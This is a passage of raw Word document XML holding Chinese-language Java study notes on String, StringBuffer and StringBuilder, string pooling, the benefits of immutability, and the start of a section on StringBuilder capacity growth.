      <w:r w:rsidR="00D3053B" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001A4396" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D3053B" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>append</w:t>
      </w:r>
      <w:r w:rsidR="00D3053B" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作是在原有对象的基础上进行的。</w:t>
      </w:r>
      <w:r w:rsidR="004E35B7" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可变对象，</w:t>
      </w:r>
      <w:r w:rsidR="004E35B7" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不是线程安全</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510069" w:rsidRPr="007E576B" w:rsidRDefault="001A4396" w:rsidP="007E576B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1050" w:hangingChars="500" w:hanging="1050"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类的成员方法前面多了一个关键字：</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，不用多说，这个关键字是在多线程访问时起到安全保护作用的</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>也就是说</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>StringBuffer</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是线程安全的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00510069" w:rsidRPr="007E576B" w:rsidRDefault="00835498" w:rsidP="007E576B">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1260" w:hangingChars="600" w:hanging="1260"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符串常量池</w:t>
      </w:r>
      <w:r w:rsidR="00510069" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆内存</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中一个特殊的存储区域</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当创建一个</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象时</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>假如此字符串值已经存在于常量池中</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>则不会创建一个新的对象</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="003C6B36" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>而是引用已经存在的对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="003D63A1" w:rsidP="00F87F65">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00A54AFF" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String</w:t>
      </w:r>
      <w:r w:rsidR="00A54AFF" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不变的好处</w:t>
      </w:r>
      <w:r w:rsidR="00A54AFF" w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="000039B9" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>只有当字符串是不可变的，字符串池才有可能实现。</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>字符串池的实现可以在运行时节约很多</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>heap</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空间，因为不同的字符串变量都指向池中的同一个字符串。但如果字符串是可变的，那么</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>String interning</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>将不能实现</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>译者注：</w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="007E576B">
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:szCs w:val="21"/>
          </w:rPr>
          <w:t>String interning</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是指对不同的字符串仅仅只保存一个，即不会保存多个相同的字符串。</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，因为这样的话，如果变量改变了它的值，那么其它指向这个值的变量的值也会一起改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="000039B9" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如果字符串是可变的，那么会引起很严重的安全问题。</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>譬如，数据库的用户名、密码都是以字符串的形式传入来获得数据库的连接，或者在</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>编程中，主机名和端口都是以字符串的形式传入。因为字符串是不可变的，所以它的值是不可改变的，否则黑客们可以钻到空子，改变字符串指向的对象的值，造成安全漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="000039B9" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(3)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为字符串是不可变的，所以是多线程安全的</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，同一个字符串实例可以被多个线程共享。这样便不用因为线程安全问题而使用同步。字符串自己便是线程安全的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="000039B9" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(4)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类加载器要用到字符串，不可变性提供了安全性，以便正确的类被加载</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。譬如你想加载</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>java.sql.Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类，而这个值被改成了</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>myhacked.Connection</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，那么会对你的数据库造成不可知的破坏。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000039B9" w:rsidRPr="007E576B" w:rsidRDefault="000039B9" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>因为字符串是不可变的，所以在它创建的时候</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hashcode</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>就被缓存了</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，不需要重新计算。这就使得字符串很适合作为</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的键，字符串的处理速度要快过其它的键对象。这就是</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="007E576B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中的键往往都使用字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007240CB" w:rsidRPr="00A7236F" w:rsidRDefault="00D6708F" w:rsidP="007240CB">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.1.2</w:t>
      </w:r>
      <w:r w:rsidR="007E4B8C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.2</w:t>
      </w:r>
      <w:r w:rsidR="007240CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> StringBuilder</w:t>
      </w:r>
      <w:r w:rsidR="007240CB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩容</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD2A8B" w:rsidRPr="00CD2A8B" w:rsidRDefault="00CD2A8B" w:rsidP="0056620E">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8735" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
          <w:right w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8735"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F405BD" w:rsidRPr="00F405BD" w:rsidTr="00F405BD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8300" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:left w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:bottom w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
              <w:right w:val="single" w:sz="6" w:space="0" w:color="CCCCCC"/>
            </w:tcBorders>
            <w:tcMar>
              <w:top w:w="48" w:type="dxa"/>
              <w:left w:w="110" w:type="dxa"/>
              <w:bottom w:w="48" w:type="dxa"/>
              <w:right w:w="110" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="00F405BD" w:rsidRPr="0053559D" w:rsidRDefault="00F405BD" w:rsidP="007B238C">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="209" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>public</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>final</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>class</w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>StringBuffer</w:t>
            </w:r>
            <w:r w:rsidR="007B238C" w:rsidRPr="0053559D">
              <w:rPr>
                <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="宋体" w:hAnsiTheme="majorHAnsi" w:cs="宋体"/>
                <w:color w:val="4F81BD" w:themeColor="accent1"/>
                <w:kern w:val="0"/>
                <w:sz w:val="19"/>
